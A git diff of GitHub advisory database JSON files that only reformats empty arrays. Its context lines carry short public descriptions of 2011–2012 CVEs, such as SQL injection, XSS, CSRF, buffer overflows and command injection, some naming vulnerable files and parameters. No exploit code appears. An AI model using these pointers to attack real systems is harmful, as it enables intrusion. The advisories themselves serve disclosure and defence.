a/advisories/unreviewed/2022/05/GHSA-fwwq-76h7-8wfr/GHSA-fwwq-76h7-8wfr.json b/advisories/unreviewed/2022/05/GHSA-fwwq-76h7-8wfr/GHSA-fwwq-76h7-8wfr.json index 58cec74f5f0..96b851b4099 100644 --- a/advisories/unreviewed/2022/05/GHSA-fwwq-76h7-8wfr/GHSA-fwwq-76h7-8wfr.json +++ b/advisories/unreviewed/2022/05/GHSA-fwwq-76h7-8wfr/GHSA-fwwq-76h7-8wfr.json @@ -7,12 +7,8 @@ "CVE-2012-1620" ], "details": "slock 0.9 does not properly handle the XRaiseWindow event when the screen is locked, which might allow physically proximate attackers to obtain sensitive information by pressing a button, which reveals the desktop and active windows.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-g283-wj82-gpc9/GHSA-g283-wj82-gpc9.json b/advisories/unreviewed/2022/05/GHSA-g283-wj82-gpc9/GHSA-g283-wj82-gpc9.json index efebad54e12..6c9e8cd1bc6 100644 --- a/advisories/unreviewed/2022/05/GHSA-g283-wj82-gpc9/GHSA-g283-wj82-gpc9.json +++ b/advisories/unreviewed/2022/05/GHSA-g283-wj82-gpc9/GHSA-g283-wj82-gpc9.json @@ -7,12 +7,8 @@ "CVE-2012-1616" ], "details": "Use-after-free vulnerability in icclib before 2.13, as used by Argyll CMS before 1.4 and possibly other programs, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a crafted ICC profile file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-g2rf-44r4-2pxc/GHSA-g2rf-44r4-2pxc.json b/advisories/unreviewed/2022/05/GHSA-g2rf-44r4-2pxc/GHSA-g2rf-44r4-2pxc.json index 11da49878bd..1e960efc1ce 100644 --- a/advisories/unreviewed/2022/05/GHSA-g2rf-44r4-2pxc/GHSA-g2rf-44r4-2pxc.json +++ b/advisories/unreviewed/2022/05/GHSA-g2rf-44r4-2pxc/GHSA-g2rf-44r4-2pxc.json @@ -7,12 +7,8 @@ "CVE-2011-5140" ], "details": "Multiple SQL injection vulnerabilities in the blog module 1.0 for DiY-CMS allow remote attackers to execute arbitrary SQL commands via the (1) start parameter to (a) tags.php, (b) list.php, (c) index.php, (d) main_index.php, (e) viewpost.php, (f) archive.php, (g) control/approve_comments.php, (h) control/approve_posts.php, and (i) control/viewcat.php; and the (2) month and (3) year parameters to archive.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g3gx-5w5q-5654/GHSA-g3gx-5w5q-5654.json b/advisories/unreviewed/2022/05/GHSA-g3gx-5w5q-5654/GHSA-g3gx-5w5q-5654.json index e950c22dd48..392e838a455 100644 --- a/advisories/unreviewed/2022/05/GHSA-g3gx-5w5q-5654/GHSA-g3gx-5w5q-5654.json +++ b/advisories/unreviewed/2022/05/GHSA-g3gx-5w5q-5654/GHSA-g3gx-5w5q-5654.json @@ -7,12 +7,8 @@ "CVE-2011-5253" ], "details": "Dl Download Ticket Service 0.3 through 0.9 allows remote attackers to login as an arbitrary user by supplying an authorization header.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g42v-6vx7-992j/GHSA-g42v-6vx7-992j.json b/advisories/unreviewed/2022/05/GHSA-g42v-6vx7-992j/GHSA-g42v-6vx7-992j.json index a0becb0d146..467d10d1966 100644 --- a/advisories/unreviewed/2022/05/GHSA-g42v-6vx7-992j/GHSA-g42v-6vx7-992j.json +++ b/advisories/unreviewed/2022/05/GHSA-g42v-6vx7-992j/GHSA-g42v-6vx7-992j.json @@ -7,12 +7,8 @@ "CVE-2011-5224" ], "details": "SQL injection vulnerability in the Sentinel plugin 1.0.0 for WordPress allows remote attackers to execute arbitrary SQL commands via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g4wh-mvqv-5fvh/GHSA-g4wh-mvqv-5fvh.json b/advisories/unreviewed/2022/05/GHSA-g4wh-mvqv-5fvh/GHSA-g4wh-mvqv-5fvh.json index bbfa5c495c1..d75f817939c 100644 --- a/advisories/unreviewed/2022/05/GHSA-g4wh-mvqv-5fvh/GHSA-g4wh-mvqv-5fvh.json +++ b/advisories/unreviewed/2022/05/GHSA-g4wh-mvqv-5fvh/GHSA-g4wh-mvqv-5fvh.json @@ -7,12 +7,8 @@ "CVE-2011-4341" ], "details": "Multiple SQL injection vulnerabilities in symphony/content/content.publish.php in Symphony CMS 2.2.3 and possibly other versions before 2.2.4 allow remote authenticated users with Author permissions to execute arbitrary SQL commands via the filter parameter to (1) symphony/publish/comments or (2) symphony/publish/images. NOTE: this issue can be leveraged to perform cross-site scripting (XSS) attacks via error messages. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g533-vrrr-6j8r/GHSA-g533-vrrr-6j8r.json b/advisories/unreviewed/2022/05/GHSA-g533-vrrr-6j8r/GHSA-g533-vrrr-6j8r.json index cd039af0e6b..dcf2618d2c3 100644 --- a/advisories/unreviewed/2022/05/GHSA-g533-vrrr-6j8r/GHSA-g533-vrrr-6j8r.json +++ b/advisories/unreviewed/2022/05/GHSA-g533-vrrr-6j8r/GHSA-g533-vrrr-6j8r.json @@ -7,12 +7,8 @@ "CVE-2012-2451" ], "details": "The Config::IniFiles module before 2.71 for Perl creates temporary files with predictable names, which allows local users to overwrite arbitrary files via a symlink attack. NOTE: some of these details are obtained from third party information. NOTE: it has been reported that this might only be exploitable by writing in the same directory as the .ini file. If this is the case, then this issue might not cross privilege boundaries.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -64,9 +60,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-g58g-3cj2-cwq2/GHSA-g58g-3cj2-cwq2.json b/advisories/unreviewed/2022/05/GHSA-g58g-3cj2-cwq2/GHSA-g58g-3cj2-cwq2.json index 735f8fd9fbc..30b09a2364a 100644 --- a/advisories/unreviewed/2022/05/GHSA-g58g-3cj2-cwq2/GHSA-g58g-3cj2-cwq2.json +++ b/advisories/unreviewed/2022/05/GHSA-g58g-3cj2-cwq2/GHSA-g58g-3cj2-cwq2.json @@ -7,12 +7,8 @@ "CVE-2011-5226" ], "details": "Cross-site request forgery (CSRF) vulnerability in wordpress_sentinel.php in the Sentinel plugin 1.0.0 for WordPress allows remote attackers to hijack the authentication of an administrator for requests that trigger snapshots.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g5fm-9m5g-qh66/GHSA-g5fm-9m5g-qh66.json b/advisories/unreviewed/2022/05/GHSA-g5fm-9m5g-qh66/GHSA-g5fm-9m5g-qh66.json index 05c3e34b4b4..6522f20547d 100644 --- a/advisories/unreviewed/2022/05/GHSA-g5fm-9m5g-qh66/GHSA-g5fm-9m5g-qh66.json +++ b/advisories/unreviewed/2022/05/GHSA-g5fm-9m5g-qh66/GHSA-g5fm-9m5g-qh66.json @@ -7,12 +7,8 @@ "CVE-2012-2437" ], "details": "cookie_gen.php in ar web content manager (AWCM) 2.2 does not require authentication, which allows remote attackers to generate arbitrary cookies via the name parameter in conjunction with the content parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g66j-xrpg-6cgc/GHSA-g66j-xrpg-6cgc.json b/advisories/unreviewed/2022/05/GHSA-g66j-xrpg-6cgc/GHSA-g66j-xrpg-6cgc.json index 2d39303ad09..34939d7bb9f 100644 --- a/advisories/unreviewed/2022/05/GHSA-g66j-xrpg-6cgc/GHSA-g66j-xrpg-6cgc.json +++ b/advisories/unreviewed/2022/05/GHSA-g66j-xrpg-6cgc/GHSA-g66j-xrpg-6cgc.json @@ -7,12 +7,8 @@ "CVE-2012-0706" ], "details": "IBM Scale Out Network Attached Storage (SONAS) 1.3 before 1.3.2.3 requires cleartext storage of LDAP credentials without recommending a less privileged LDAP account, which might allow attackers to obtain sensitive server information by leveraging root access to a client machine.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-g6c6-8h8v-2m9x/GHSA-g6c6-8h8v-2m9x.json b/advisories/unreviewed/2022/05/GHSA-g6c6-8h8v-2m9x/GHSA-g6c6-8h8v-2m9x.json index 0e257e6358d..c30d40a415b 100644 --- a/advisories/unreviewed/2022/05/GHSA-g6c6-8h8v-2m9x/GHSA-g6c6-8h8v-2m9x.json +++ b/advisories/unreviewed/2022/05/GHSA-g6c6-8h8v-2m9x/GHSA-g6c6-8h8v-2m9x.json @@ -7,12 +7,8 @@ "CVE-2012-1729" ], "details": "Unspecified vulnerability in the Hyperion BI+ component in Oracle Hyperion 11.1.1.3 and earlier allows remote attackers to affect integrity via unknown vectors related to UI and Visualization.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-g6rc-hwmp-x6w7/GHSA-g6rc-hwmp-x6w7.json b/advisories/unreviewed/2022/05/GHSA-g6rc-hwmp-x6w7/GHSA-g6rc-hwmp-x6w7.json index cbd01e0c075..9f3e9b509a1 100644 --- a/advisories/unreviewed/2022/05/GHSA-g6rc-hwmp-x6w7/GHSA-g6rc-hwmp-x6w7.json +++ b/advisories/unreviewed/2022/05/GHSA-g6rc-hwmp-x6w7/GHSA-g6rc-hwmp-x6w7.json @@ -7,12 +7,8 @@ "CVE-2012-2720" ], "details": "The Token Authentication (tokenauth) module 6.x-1.x before 6.x-1.7 for Drupal does not properly revert user sessions, which might allow remote attackers to perform requests with extra privileges.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-g6vg-488v-2vgh/GHSA-g6vg-488v-2vgh.json b/advisories/unreviewed/2022/05/GHSA-g6vg-488v-2vgh/GHSA-g6vg-488v-2vgh.json index a8895cffc1b..992441d71da 100644 --- a/advisories/unreviewed/2022/05/GHSA-g6vg-488v-2vgh/GHSA-g6vg-488v-2vgh.json +++ b/advisories/unreviewed/2022/05/GHSA-g6vg-488v-2vgh/GHSA-g6vg-488v-2vgh.json @@ -7,12 +7,8 @@ "CVE-2011-4852" ], "details": "The Control Panel in Parallels Plesk Panel 10.4.4_build20111103.18 generates web pages containing external links in response to GET requests with query strings for enterprise/mobile-monitor/ and certain other files, which makes it easier for remote attackers to obtain sensitive information by reading (1) web-server access logs or (2) web-server Referer logs, related to a \"cross-domain Referer leakage\" issue.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g8r5-vx2f-jmh2/GHSA-g8r5-vx2f-jmh2.json b/advisories/unreviewed/2022/05/GHSA-g8r5-vx2f-jmh2/GHSA-g8r5-vx2f-jmh2.json index a22a7644c4b..82d19f56520 100644 --- a/advisories/unreviewed/2022/05/GHSA-g8r5-vx2f-jmh2/GHSA-g8r5-vx2f-jmh2.json +++ b/advisories/unreviewed/2022/05/GHSA-g8r5-vx2f-jmh2/GHSA-g8r5-vx2f-jmh2.json @@ -7,12 +7,8 @@ "CVE-2012-0730" ], "details": "Multiple cross-site request forgery (CSRF) vulnerabilities in IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 allow remote attackers to hijack the authentication of administrators for requests that create administrative accounts.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g8w6-v52m-xmgv/GHSA-g8w6-v52m-xmgv.json b/advisories/unreviewed/2022/05/GHSA-g8w6-v52m-xmgv/GHSA-g8w6-v52m-xmgv.json index 4edd4f2ba66..6f3bb081d9e 100644 --- a/advisories/unreviewed/2022/05/GHSA-g8w6-v52m-xmgv/GHSA-g8w6-v52m-xmgv.json +++ b/advisories/unreviewed/2022/05/GHSA-g8w6-v52m-xmgv/GHSA-g8w6-v52m-xmgv.json @@ -7,12 +7,8 @@ "CVE-2012-1764" ], "details": "Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.50, 8.51, and 8.52 allows remote authenticated users to affect integrity, related to MCF.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-g9hc-c85f-2p82/GHSA-g9hc-c85f-2p82.json b/advisories/unreviewed/2022/05/GHSA-g9hc-c85f-2p82/GHSA-g9hc-c85f-2p82.json index 640ad5ffac0..7d4bcc62258 100644 --- a/advisories/unreviewed/2022/05/GHSA-g9hc-c85f-2p82/GHSA-g9hc-c85f-2p82.json +++ b/advisories/unreviewed/2022/05/GHSA-g9hc-c85f-2p82/GHSA-g9hc-c85f-2p82.json @@ -7,12 +7,8 @@ "CVE-2012-2770" ], "details": "The Authen::ExternalAuth extension before 0.11 for Best Practical Solutions RT allows remote attackers to obtain a logged-in session via unspecified vectors related to the \"URL of a RSS feed of the user.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gc7w-7m76-2gc2/GHSA-gc7w-7m76-2gc2.json b/advisories/unreviewed/2022/05/GHSA-gc7w-7m76-2gc2/GHSA-gc7w-7m76-2gc2.json index d61e6b29f3c..d2169d661d8 100644 --- a/advisories/unreviewed/2022/05/GHSA-gc7w-7m76-2gc2/GHSA-gc7w-7m76-2gc2.json +++ b/advisories/unreviewed/2022/05/GHSA-gc7w-7m76-2gc2/GHSA-gc7w-7m76-2gc2.json @@ -7,12 +7,8 @@ "CVE-2011-5166" ], "details": "Multiple stack-based buffer overflows in KnFTP 1.0.0 allow remote attackers to execute arbitrary code via a long string to the (1) USER, (2) PASS, (3) REIN, (4) QUIT, (5) PORT, (6) PASV, (7) TYPE, (8) STRU, (9) MODE, (10) RETR, (11) STOR, (12) APPE, (13) ALLO, (14) REST, (15) RNFR, (16) RNTO, (17) ABOR, (18) DELE, (19) CWD, (20) LIST, (21) NLST, (22) SITE, (23) STST, (24) HELP, (25) NOOP, (26) MKD, (27) RMD, (28) PWD, (29) CDUP, (30) STOU, (31) SNMT, (32) SYST, and (33) XPWD commands.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gcw7-gp3x-gx2j/GHSA-gcw7-gp3x-gx2j.json b/advisories/unreviewed/2022/05/GHSA-gcw7-gp3x-gx2j/GHSA-gcw7-gp3x-gx2j.json index 41ee6d7be9f..908bfcea7f5 100644 --- a/advisories/unreviewed/2022/05/GHSA-gcw7-gp3x-gx2j/GHSA-gcw7-gp3x-gx2j.json +++ b/advisories/unreviewed/2022/05/GHSA-gcw7-gp3x-gx2j/GHSA-gcw7-gp3x-gx2j.json @@ -7,12 +7,8 @@ "CVE-2011-5171" ], "details": "Multiple stack-based buffer overflows in CyberLink Power2Go 7 (build 196) and 8 (build 1031) allow remote attackers to execute arbitrary code via the (1) src and (2) name parameters in a p2g project file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gfcf-47fv-3q9j/GHSA-gfcf-47fv-3q9j.json b/advisories/unreviewed/2022/05/GHSA-gfcf-47fv-3q9j/GHSA-gfcf-47fv-3q9j.json index 54d4e7f60dc..48a8e668f2a 100644 --- a/advisories/unreviewed/2022/05/GHSA-gfcf-47fv-3q9j/GHSA-gfcf-47fv-3q9j.json +++ b/advisories/unreviewed/2022/05/GHSA-gfcf-47fv-3q9j/GHSA-gfcf-47fv-3q9j.json @@ -7,12 +7,8 @@ "CVE-2012-2743" ], "details": "Revelation 0.4.13-2 and earlier does not iterate through SHA hashing algorithms for AES encryption, which makes it easier for context-dependent attackers to guess passwords via a brute force attack.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gffp-3jpx-85xw/GHSA-gffp-3jpx-85xw.json b/advisories/unreviewed/2022/05/GHSA-gffp-3jpx-85xw/GHSA-gffp-3jpx-85xw.json index 4face514d94..6779f26cd9b 100644 --- a/advisories/unreviewed/2022/05/GHSA-gffp-3jpx-85xw/GHSA-gffp-3jpx-85xw.json +++ b/advisories/unreviewed/2022/05/GHSA-gffp-3jpx-85xw/GHSA-gffp-3jpx-85xw.json @@ -7,12 +7,8 @@ "CVE-2012-1652" ], "details": "Cross-site scripting (XSS) vulnerability in the Hierarchical Select module 6.x-3.x before 6.x-3.8 for Drupal allows remote authenticated users with administer taxonomy permissions to inject arbitrary web script or HTML via unspecified vectors related to \"the vocabulary's help text.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gg5p-5hw9-qmgj/GHSA-gg5p-5hw9-qmgj.json b/advisories/unreviewed/2022/05/GHSA-gg5p-5hw9-qmgj/GHSA-gg5p-5hw9-qmgj.json index 06edbcafa8a..92b9a3b7044 100644 --- a/advisories/unreviewed/2022/05/GHSA-gg5p-5hw9-qmgj/GHSA-gg5p-5hw9-qmgj.json +++ b/advisories/unreviewed/2022/05/GHSA-gg5p-5hw9-qmgj/GHSA-gg5p-5hw9-qmgj.json @@ -7,12 +7,8 @@ "CVE-2011-5277" ], "details": "Multiple SQL injection vulnerabilities in signature.php in the Advanced Forum Signatures (aka afsignatures) plugin 2.0.4 for MyBB allow remote attackers to execute arbitrary SQL commands via the (1) afs_type, (2) afs_background, (3) afs_showonline, (4) afs_bar_left, (5) afs_bar_center, (6) afs_full_line1, (7) afs_full_line2, (8) afs_full_line3, (9) afs_full_line4, (10) afs_full_line5, or (11) afs_full_line6 parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gh98-frpq-mxgp/GHSA-gh98-frpq-mxgp.json b/advisories/unreviewed/2022/05/GHSA-gh98-frpq-mxgp/GHSA-gh98-frpq-mxgp.json index 4c71fb472b7..e0f4a4c1f39 100644 --- a/advisories/unreviewed/2022/05/GHSA-gh98-frpq-mxgp/GHSA-gh98-frpq-mxgp.json +++ b/advisories/unreviewed/2022/05/GHSA-gh98-frpq-mxgp/GHSA-gh98-frpq-mxgp.json @@ -7,12 +7,8 @@ "CVE-2012-3308" ], "details": "Cross-site scripting (XSS) vulnerability in IBM Sametime 8.0.2 through 8.5.2.1 allows remote attackers to inject arbitrary web script or HTML via an IM chat.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gj36-cq98-vqc6/GHSA-gj36-cq98-vqc6.json b/advisories/unreviewed/2022/05/GHSA-gj36-cq98-vqc6/GHSA-gj36-cq98-vqc6.json index ef813cac032..2bc850d5073 100644 --- a/advisories/unreviewed/2022/05/GHSA-gj36-cq98-vqc6/GHSA-gj36-cq98-vqc6.json +++ b/advisories/unreviewed/2022/05/GHSA-gj36-cq98-vqc6/GHSA-gj36-cq98-vqc6.json @@ -7,12 +7,8 @@ "CVE-2011-3835" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Wuzly 2.0 allow remote attackers to inject arbitrary web script or HTML via the Referer header to (1) admin/login.php and (2) admin/404.php; the (3) q parameter to search.php; the (4) theme_name parameter to theme_settings.php, (5) extension_name parameter to extension_settings.php, (6) q parameter to search.php, (7) type parameter to comments.php, sort parameter to (8) pages.php and (9) posts.php, and the (10) type and (11) q parameter to media.php in admin/; the sidebar parameter to (12) add_widget.php and (13) widgets.php, id parameter to (14) category_delete.php, (15) comment.php, (16) page_delete.php, and (17) post_delete.php, (18) type parameter to media.php, and (19) id and (20) sidebar parameter to widget_delete.php in mobile/; and the (21) name, (22) email, (23) website, and (24) comment parameters to index.php; and the (25) username parameter to admin/login.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gj5v-vm5q-cx98/GHSA-gj5v-vm5q-cx98.json b/advisories/unreviewed/2022/05/GHSA-gj5v-vm5q-cx98/GHSA-gj5v-vm5q-cx98.json index 43655cc91f1..a692fa69883 100644 --- a/advisories/unreviewed/2022/05/GHSA-gj5v-vm5q-cx98/GHSA-gj5v-vm5q-cx98.json +++ b/advisories/unreviewed/2022/05/GHSA-gj5v-vm5q-cx98/GHSA-gj5v-vm5q-cx98.json @@ -7,12 +7,8 @@ "CVE-2012-3745" ], "details": "Off-by-one error in Telephony in Apple iOS before 6 allows remote attackers to cause a denial of service (buffer overflow and connectivity outage) via a crafted user-data header in an SMS message.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gjj3-5cjq-r87r/GHSA-gjj3-5cjq-r87r.json b/advisories/unreviewed/2022/05/GHSA-gjj3-5cjq-r87r/GHSA-gjj3-5cjq-r87r.json index c44e2673538..d4535bcb2e1 100644 --- a/advisories/unreviewed/2022/05/GHSA-gjj3-5cjq-r87r/GHSA-gjj3-5cjq-r87r.json +++ b/advisories/unreviewed/2022/05/GHSA-gjj3-5cjq-r87r/GHSA-gjj3-5cjq-r87r.json @@ -7,12 +7,8 @@ "CVE-2012-3802" ], "details": "Unspecified vulnerability in the Post Affiliate Pro (PAP) module for Drupal allows remote authenticated users to read the commissions of other users via unknown attack vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gqmh-7vv7-cv43/GHSA-gqmh-7vv7-cv43.json b/advisories/unreviewed/2022/05/GHSA-gqmh-7vv7-cv43/GHSA-gqmh-7vv7-cv43.json index a02bab8ed0c..f15fdff2fb0 100644 --- a/advisories/unreviewed/2022/05/GHSA-gqmh-7vv7-cv43/GHSA-gqmh-7vv7-cv43.json +++ b/advisories/unreviewed/2022/05/GHSA-gqmh-7vv7-cv43/GHSA-gqmh-7vv7-cv43.json @@ -7,12 +7,8 @@ "CVE-2012-3579" ], "details": "Symantec Messaging Gateway (SMG) before 10.0 has a default password for an unspecified account, which makes it easier for remote attackers to obtain privileged access via an SSH session.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gqv4-jgmq-rfxp/GHSA-gqv4-jgmq-rfxp.json b/advisories/unreviewed/2022/05/GHSA-gqv4-jgmq-rfxp/GHSA-gqv4-jgmq-rfxp.json index a7fd7a38d4c..e081d37f023 100644 --- a/advisories/unreviewed/2022/05/GHSA-gqv4-jgmq-rfxp/GHSA-gqv4-jgmq-rfxp.json +++ b/advisories/unreviewed/2022/05/GHSA-gqv4-jgmq-rfxp/GHSA-gqv4-jgmq-rfxp.json @@ -7,12 +7,8 @@ "CVE-2012-0993" ], "details": "Eval injection vulnerability in zp-core/zp-extensions/viewer_size_image.php in ZENphoto 1.4.2, when the viewer_size_image plugin is enabled, allows remote attackers to execute arbitrary PHP code via the viewer_size_image_saved cookie.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gqxm-8c59-p8xh/GHSA-gqxm-8c59-p8xh.json b/advisories/unreviewed/2022/05/GHSA-gqxm-8c59-p8xh/GHSA-gqxm-8c59-p8xh.json index 6a5ef43d132..01473d57acb 100644 --- a/advisories/unreviewed/2022/05/GHSA-gqxm-8c59-p8xh/GHSA-gqxm-8c59-p8xh.json +++ b/advisories/unreviewed/2022/05/GHSA-gqxm-8c59-p8xh/GHSA-gqxm-8c59-p8xh.json @@ -7,12 +7,8 @@ "CVE-2012-0992" ], "details": "interface/fax/fax_dispatch.php in OpenEMR 4.1.0 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the file parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gr45-mrff-92w9/GHSA-gr45-mrff-92w9.json b/advisories/unreviewed/2022/05/GHSA-gr45-mrff-92w9/GHSA-gr45-mrff-92w9.json index aecc6efe2f4..48ff0b1bf6f 100644 --- a/advisories/unreviewed/2022/05/GHSA-gr45-mrff-92w9/GHSA-gr45-mrff-92w9.json +++ b/advisories/unreviewed/2022/05/GHSA-gr45-mrff-92w9/GHSA-gr45-mrff-92w9.json @@ -7,12 +7,8 @@ "CVE-2011-5228" ], "details": "Cross-site scripting (XSS) vulnerability in the Search module (quickstart/search) in appRain CMF 0.1.5 allows remote attackers to inject arbitrary web script or HTML via the ss parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-grv9-4f8h-7vm2/GHSA-grv9-4f8h-7vm2.json b/advisories/unreviewed/2022/05/GHSA-grv9-4f8h-7vm2/GHSA-grv9-4f8h-7vm2.json index 3bc02f160a2..34ae6f8a504 100644 --- a/advisories/unreviewed/2022/05/GHSA-grv9-4f8h-7vm2/GHSA-grv9-4f8h-7vm2.json +++ b/advisories/unreviewed/2022/05/GHSA-grv9-4f8h-7vm2/GHSA-grv9-4f8h-7vm2.json @@ -7,12 +7,8 @@ "CVE-2012-1781" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in ajax/commentajax.php in SocialCMS 1.0.5 allow remote attackers to inject arbitrary web script or HTML via the (1) TREF_email_address or (2) TR_name parameters.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gv6g-j433-qjh3/GHSA-gv6g-j433-qjh3.json b/advisories/unreviewed/2022/05/GHSA-gv6g-j433-qjh3/GHSA-gv6g-j433-qjh3.json index 3520a454f0c..3d1c225cbf1 100644 --- a/advisories/unreviewed/2022/05/GHSA-gv6g-j433-qjh3/GHSA-gv6g-j433-qjh3.json +++ b/advisories/unreviewed/2022/05/GHSA-gv6g-j433-qjh3/GHSA-gv6g-j433-qjh3.json @@ -7,12 +7,8 @@ "CVE-2012-0985" ], "details": "Multiple buffer overflows in the Wireless Manager ActiveX control 4.0.0.0 in WifiMan.dll in Sony VAIO PC Wireless LAN Wizard 1.0; VAIO Wireless Wizard 1.00, 1.00_64, 1.0.1, 2.0, and 3.0; SmartWi Connection Utility 4.7, 4.7.4, 4.8, 4.9, 4.10, and 4.11; and VAIO Easy Connect software 1.0.0 and 1.1.0 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long string in the second argument of the (1) SetTmpProfileOption or (2) ConnectToNetwork method.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git 